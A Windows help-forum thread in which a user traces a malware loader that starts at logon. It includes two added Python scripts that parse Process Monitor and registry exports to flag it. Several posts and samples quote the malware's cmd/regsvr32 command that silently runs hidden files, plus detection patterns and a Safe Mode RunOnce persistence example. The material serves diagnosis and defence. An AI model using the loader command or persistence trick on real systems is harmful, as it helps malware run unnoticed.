Unknown causing cmd.exe to launch with suspicious cmd call


Unknown causing cmd.exe to launch with suspicious cmd call

Post by joe_devore » Sat Jan 10, 2015 9:24 pm

Starting just, idk, last night or the day before....

I found this odd cmd window popping up on load of my desktop..... O_o :?
I tried Googling it to no avail..


I checked CCleaner, Spybot, the Run regedit keys and Autoruns (Sysinternals) and could NOT find ANY AutoStart reference ANYWHERE ;>_<; O_o

Code:
C:\WINDOWS\system32\cmd.exe  /K for  /F %i in ('dir /b /a:h-d /w "C:\Documents and Settings\All Users\Application Data\1837308050\*"') do start /b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"


I had Process Monitor (by Sysinternals) do a bootlog ^_^ haha

UNKNOWN_cmd_start_.txt__ProcessMonitor-Logfile__short.PML
is a short log, pre-filtered looking for "1837308050"

and an exported xml file...

The pml file is easier to read but you will need Process Monitor to open/read it.
Now I could attach an archive with them in it or I could just post the link for the download page at the Sysinternals home website..
http://technet.microsoft.com/en-us/sysinternals/bb896645
Note the 64-bit versions of Process Explorer and Process Monitor are held internally in the ones you will download from their home site...
If your system is 64-bit it will auto-extract the 64-bit exe to the temp folder, so just grab a copy from there to have your own permanent copy of it.




PS:
It's possible I deleted that #'ed folder, finding its existence suspicious, and the files found there were not associated with any known program I use......

Since I cannot upload a text file (<<-- REALLY? GIVE me a break, a txt file?! :roll: )

I have attached a rar archive containing a text file with the cmd string as well as the Process Monitor log files.
Attachments
UNKNOWN_cmd_atempting to run_.rar
Text file with cmd string and Process Monitor Log files.
joe_devore
Green Belt
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA
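The bootlog approach above is the right one: a Process Monitor capture records every "Process Create" with the child PID and its full command line in the Detail column, so the question "what launched cmd.exe" can be answered by walking the parent chain instead of hunting for an autostart entry. The script below is an added example, not part of joe_devore's post or of the Sysinternals tools. It parses a Procmon CSV export (File > Save, CSV), flags command lines that match the pattern quoted in the thread (a cmd for-loop over hidden files in a numeric-only Application Data folder, handed to regsvr32 with /s /n /i:), and prints the chain of parents for each hit. The sample CSV is constructed: the PIDs, timestamps, the parent chain and the file name a1b2c3.dat are made up; only the cmd.exe command line is the one from the post.

```python
import csv
import io
import re

# Constructed sample of a Process Monitor CSV export reduced to
# "Process Create" rows. Procmon puts the child PID and command line in
# the Detail column. PIDs, times, the chain and a1b2c3.dat are invented;
# the cmd.exe command line is the one quoted in the thread.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:24:00.0100000 PM","winlogon.exe","452","Process Create","C:\WINDOWS\system32\userinit.exe","SUCCESS","PID: 600, Command line: C:\WINDOWS\system32\userinit.exe"
"9:24:00.5000000 PM","userinit.exe","600","Process Create","C:\WINDOWS\explorer.exe","SUCCESS","PID: 1240, Command line: C:\WINDOWS\Explorer.EXE"
"9:24:03.2000000 PM","explorer.exe","1240","Process Create","C:\WINDOWS\system32\cmd.exe","SUCCESS","PID: 1588, Command line: C:\WINDOWS\system32\cmd.exe  /K for  /F %i in ('dir /b /a:h-d /w ""C:\Documents and Settings\All Users\Application Data\1837308050\*""') do start /b regsvr32.exe /s /n /i:""/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 "" ""C:\Documents and Settings\All Users\Application Data\1837308050\%i"""
"9:24:03.9000000 PM","cmd.exe","1588","Process Create","C:\WINDOWS\system32\regsvr32.exe","SUCCESS","PID: 1604, Command line: regsvr32.exe /s /n /i:""/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 "" ""C:\Documents and Settings\All Users\Application Data\1837308050\a1b2c3.dat"""
"9:24:05.0000000 PM","explorer.exe","1240","Process Create","C:\Program Files\Mozilla Firefox\firefox.exe","SUCCESS","PID: 1700, Command line: ""C:\Program Files\Mozilla Firefox\firefox.exe"""
'''

# Procmon's Detail text for a Process Create event.
DETAIL_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)", re.S)

# Indicators taken from the command line in the thread, used defensively
# to pick the interesting rows out of a large capture.
SUSPICIOUS = [
    ("regsvr32 silent install with /s /n /i:",
     re.compile(r"regsvr32(\.exe)?\s.*?/s\s+/n\s+/i:", re.I)),
    ("cmd for /F loop over hidden files (dir /b /a:h)",
     re.compile(r"for\s+/F\b.*?dir\s+/b\s+/a:h", re.I)),
    ("payload in a numeric-only Application Data folder",
     re.compile(r"Application Data\\\d{6,}\\", re.I)),
]


def parse_process_creates(csv_text):
    """Map child PID -> {parent_pid, parent_image, image, cmdline} from Process Create rows."""
    procs = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Process Create":
            continue
        m = DETAIL_RE.match(row["Detail"])
        if not m:
            continue
        procs[int(m.group(1))] = {
            "parent_pid": int(row["PID"]),       # the row's PID is the creator
            "parent_image": row["Process Name"],
            "image": row["Path"],                # Path is the child's image
            "cmdline": m.group(2),
        }
    return procs


def flag_suspicious(procs):
    """Return [(pid, [reasons])] for processes whose command line matches an indicator."""
    hits = []
    for pid, p in procs.items():
        reasons = [name for name, rx in SUSPICIOUS if rx.search(p["cmdline"])]
        if reasons:
            hits.append((pid, reasons))
    return hits


def parent_chain(procs, pid):
    """Walk Process Create records upward; returns [(pid, image)] root-first."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append((pid, procs[pid]["image"]))
        pid = procs[pid]["parent_pid"]
    if chain:
        # The topmost creator was started before the capture, but Procmon
        # still recorded its name on the row, so append it for context.
        top = procs[chain[-1][0]]
        chain.append((top["parent_pid"], top["parent_image"]))
    return list(reversed(chain))


if __name__ == "__main__":
    procs = parse_process_creates(SAMPLE_PROCMON_CSV)
    for pid, reasons in flag_suspicious(procs):
        print(f"PID {pid}: " + "; ".join(reasons))
        print("  chain: " + " -> ".join(f"{p} {img}" for p, img in parent_chain(procs, pid)))
```

Run against a real export, the chain tells you which process wrote the entry to look for: if cmd.exe hangs off explorer.exe or userinit.exe it is a logon-time autostart (Run/RunOnce, Winlogon, a startup folder), if it hangs off services.exe or svchost.exe it is a service or scheduled task, and if the parent is another user-mode program that program is the thing to inspect.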

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by Mr T » Sun Jan 11, 2015 3:44 am

1837308050
Looks like some malware or a fragment thereof. Run CCleaner and clear your temp folders. Also clear your browser(s) cache. Run Disk Cleanup from the hard drive properties. Download and install the free Malwarebytes Anti-Malware and update it. Boot into SAFE MODE and run Malwarebytes. It can throw up things not thrown up in normal mode.
I have been programming on computers since the ZX81.
I am an apprentice trained Electronics Engineer with qualifications to back it up.
I have been repairing computers since 1996.
Yet to some people I still know nothing...
Mr T
Enlightened Master
Posts: 17087
Joined: Fri Jun 14, 2002 1:03 am
Location: England

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by Karlsweldt » Sun Jan 11, 2015 7:04 am

If some unknown program or process is not desired in the Registry, HijackThis should note it. Do only a "scan".
A Windows feature called msconfig can be used from the 'Run' prompt. All the system "vitals" are listed there.. tools, configurations, processes, programs for auto-start and manual launch. Go with 'selective start' if you want to disable certain features or programs.. but use caution with some processes, or the system may not be stable.
Do as Mr T recommends.. but disable the 'restore' feature of Windows before doing so. If not done, Windows may undo all your efforts on the next normal boot! After ensuring all is good, then reactivate the 'restore' feature.
F@H.. to solve mankind's maladies.. in our lifetimes!
Karlsweldt
Mobo-fu Master
Posts: 20663
Joined: Wed Nov 12, 2003 11:57 am
Location: 07438

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by joe_devore » Sun Jan 11, 2015 4:48 pm

I always keep a clean machine, I already got rid of any files in that directory (I ended up with something one time when I forgot to enable the direct download link on SourceForge (its downloaders are pushing unwanted garbage))...

Anyways, I immediately stopped it and cleaned it out. I like Spybot S&D =D.... this might be something else...



So I reinstalled some of my drivers (all but the mobo drivers) again in case I had broken something.. no, apparently not that either....
I have performed a manual search of the registry, and used Autoruns; it can't seem to find an entry point.

TDSSKiller SCANNED the boot records, that IS CLEAN too...! so it's not loading from there.....
I keep a copy of "Kaspersky Rescue Disk" on hand, just I don't have any burnable CDs right now... :(


ho ho ho I found something....

Uninstall C:\WINDOWS\system32\tscupgrd.exe
claims to be an M$ file but is not digitally signed..
v5.2.3790.1830 (srv03_sp1_rtm.050324-1447)
Setup Custom Action Dll
© Microsoft Corporation. All rights reserved.
custom.dll

All three entries were in RunOnce folders, the 1st one was in the users_default and the other two entries were in two different user accounts...
perhaps remnants....

I have just removed them (found them thx to Spybot S&D's autostart..), reboot, see ya on the other side!
Attachments
UNKNOWN_cmd_start_Possible found.txt.rar
joe_devore
Green Belt
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA
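The find above illustrates why a clean Autoruns run does not settle the question: Autoruns shows the Run/RunOnce keys of the user it is running as unless another account is picked from its User menu, and RunOnce values are deleted when they fire, so a scan taken after logon sees nothing. A crude but complete cross-check is to export every loaded user hive with `reg export HKU hku.reg` (on XP/2003 the export is UTF-16 text) and read the autostart keys out of that file. The script below is an added example, not from the thread or from Spybot: it parses the `.reg` export format, collects Run, RunOnce and RunOnceEx values from HKLM (including the Wow6432Node view on XP x64) and from every HKEY_USERS hive, and annotates the ones worth a second look, including value names that begin with `*`, which Windows runs even in Safe Mode. The sample export is constructed; the SID and the placement of the thread's cmd.exe string in a per-user RunOnce key are made up to show what such an entry would look like, not a claim about where it was actually found.

```python
import re

# Constructed .reg export. The SID, the tscupgrd "Uninstall" values and the
# RunOnce placement of the cmd.exe string are invented for this example.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"="\"C:\\Program Files (x86)\\Spybot - Search & Destroy\\TeaTimer.exe\""

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Uninstall"="C:\\WINDOWS\\system32\\tscupgrd.exe"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Uninstall"="C:\\WINDOWS\\system32\\tscupgrd.exe"
"*1837308050"="C:\\WINDOWS\\system32\\cmd.exe /K for /F %i in ('dir /b /a:h-d /w \"C:\\Documents and Settings\\All Users\\Application Data\\1837308050\\*\"') do start /b regsvr32.exe /s /n /i:\"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 \" \"C:\\Documents and Settings\\All Users\\Application Data\\1837308050\\%i\""

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

# Section headers for the autostart keys we care about, under HKLM (with the
# optional 32-bit Wow6432Node view on x64) or under any HKEY_USERS hive.
AUTORUN_KEY_RE = re.compile(
    r"^\[(?P<hive>HKEY_USERS\\[^\\\]]+|HKEY_LOCAL_MACHINE)\\Software\\(?:Wow6432Node\\)?"
    r"Microsoft\\Windows\\CurrentVersion\\(?P<key>Run|RunOnce|RunOnceEx)\]$", re.I)
# "name"="data" lines (REG_SZ). hex:/dword:/@= lines are skipped in this example.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Indicators from the command line quoted in the thread.
SUSPECT_RE = re.compile(
    r"regsvr32(\.exe)?\s.*?/s\s+/n\s+/i:|for\s+/F\b.*?dir\s+/b\s+/a:h|Application Data\\\d{6,}\\", re.I)


def unescape_reg_string(s):
    """.reg files escape backslash and double quote with a backslash."""
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_autoruns_from_reg(text):
    """Return [{hive, key, name, command}] for every REG_SZ value under an autostart key."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            m = AUTORUN_KEY_RE.match(line)
            current = (m.group("hive"), m.group("key")) if m else None
            continue
        if current is None:
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        entries.append({"hive": current[0], "key": current[1],
                        "name": unescape_reg_string(m.group(1)),
                        "command": unescape_reg_string(m.group(2))})
    return entries


def review(entries):
    """Return [(entry, [notes])] for entries that deserve a look."""
    findings = []
    for e in entries:
        notes = []
        if e["key"].lower() != "run":
            notes.append("RunOnce-type key: the value is deleted when it fires, so post-logon scans miss it")
        if e["name"].startswith("*"):
            notes.append("name starts with '*': Windows runs this RunOnce value even in Safe Mode")
        if SUSPECT_RE.search(e["command"]):
            notes.append("command line matches the cmd/regsvr32 pattern from the thread")
        if notes:
            findings.append((e, notes))
    return findings


if __name__ == "__main__":
    for e, notes in review(parse_autoruns_from_reg(SAMPLE_REG_EXPORT)):
        print(f'{e["hive"]}\\...\\{e["key"]}  "{e["name"]}" = {e["command"]}')
        for n in notes:
            print("   -", n)
```

To use it on a real machine, run `reg export HKU hku.reg` and `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion hklm.reg` from an administrator prompt and open the files with `encoding="utf-16"`. HKEY_USERS only contains hives that are currently loaded, that is logged-on users plus .DEFAULT (the LocalSystem profile, not the "Default User" template); a profile that is not logged on has to be mounted first with `reg load HKU\tmp "C:\Documents and Settings\<user>\NTUSER.DAT"` and released with `reg unload HKU\tmp` afterwards.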

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by Karlsweldt » Sun Jan 11, 2015 5:15 pm

A lot of confusing reference links for that "tscupgrd.exe".
It is a Setup Custom Action Dll file, supposed to be in the WINDOWS\system32 folder.
If anywhere else, it may not be authentic. It could have been installed by Windows during setup, or by another program.
Some links note it is part of an executable process for Windows programming.
Some links note it as possibly a virus version.
Some links note it should be removed. Some not.
Some links note it is not harmful to the OS. Some do.
The description in this link may be of interest.. http://www.file.net/process/tscupgrd.exe.html
F@H.. to solve mankind's maladies.. in our lifetimes!
Karlsweldt
Mobo-fu Master
Posts: 20663
Joined: Wed Nov 12, 2003 11:57 am
Location: 07438

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by joe_devore » Sun Jan 11, 2015 5:53 pm

Nope, that didn't stop the cmd from loading.... with that cmd line string.....


sfc /scannow didn't report anything either...
It's useless comparing only to the older originals on the PS CD...
joe_devore
Green Belt
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by evasive » Mon Jan 12, 2015 3:03 am

You seem to have an infection called FarBar. Let me check on how to get it out properly.
We hate rut, but we fear change.
********************************
System error, strike any user to continue...
evasive
Mobo-fu Master
Posts: 37389
Joined: Sun May 06, 2001 12:01 am
Location: Netherlands

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by evasive » Mon Jan 12, 2015 4:17 am

We hate rut, but we fear change.
********************************
System error, strike any user to continue...
evasive
Mobo-fu Master
Posts: 37389
Joined: Sun May 06, 2001 12:01 am
Location: Netherlands

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by joe_devore » Mon Jan 12, 2015 6:21 am

evasive wrote: You seem to have an infection called FarBar. Let me check on how to get it out properly.

Eyy Evasive =D thx..

I attached the scanner results.... it did not generate a fix file, so it does not appear to be the FarBar....

Plus I included a SysInfo report as well as a Speccy report..

I have Daemon Tools Lite and SPTD installed among other programs which have not caused me problems...

As far as plugins and etc. for IE, all are disabled except for the Spybot plugin, but then again I never use IE, except for getting Windows updates in the past...
Firefox FOREVER ^_^ and my ext and plugin lists are clean except for the plugins I have used every single day for years, without issue.


I did a quick scan of C: for loose .JS and .vb scripts, didn't find anything suspicious at a glance...
other than some Mozilla jvm .js files in a few extracted temp folders...
Attachments
Firefox_Extennsions-List.png
Farbar Recovery Scan Tool__Scan Results (no fix list)....rar
archive includes Farbar Recovery Scan, MSInfo report and Speccy Report....
joe_devore
Green Belt
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Post by joe_devore » Mon Jan 12, 2015 6:29 am

I have noticed something else odd

C:\WINDOWS\Debug\UserMode\ChkAcc.log

I don't remember this before...
but I was using Windows XP Pro SP3 32-bit for the longest time....
Since WinXP Pro 64-bit is based on Windows Server 2003... it's only natural it's doing things differently.
Same with the Security tab in MS Event Viewer (I like the XP version, it's B.E.T.T.E.R. than the Win7 one and not as complicated).
It's showing a lot more activity, same reason as above (WinServer2k3) I guess... that is, I don't recall seeing anything suspicious...

Going to do a reboot now, have /bootlog enabled... to try and catch this...
joe_devore
Green Belt
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA
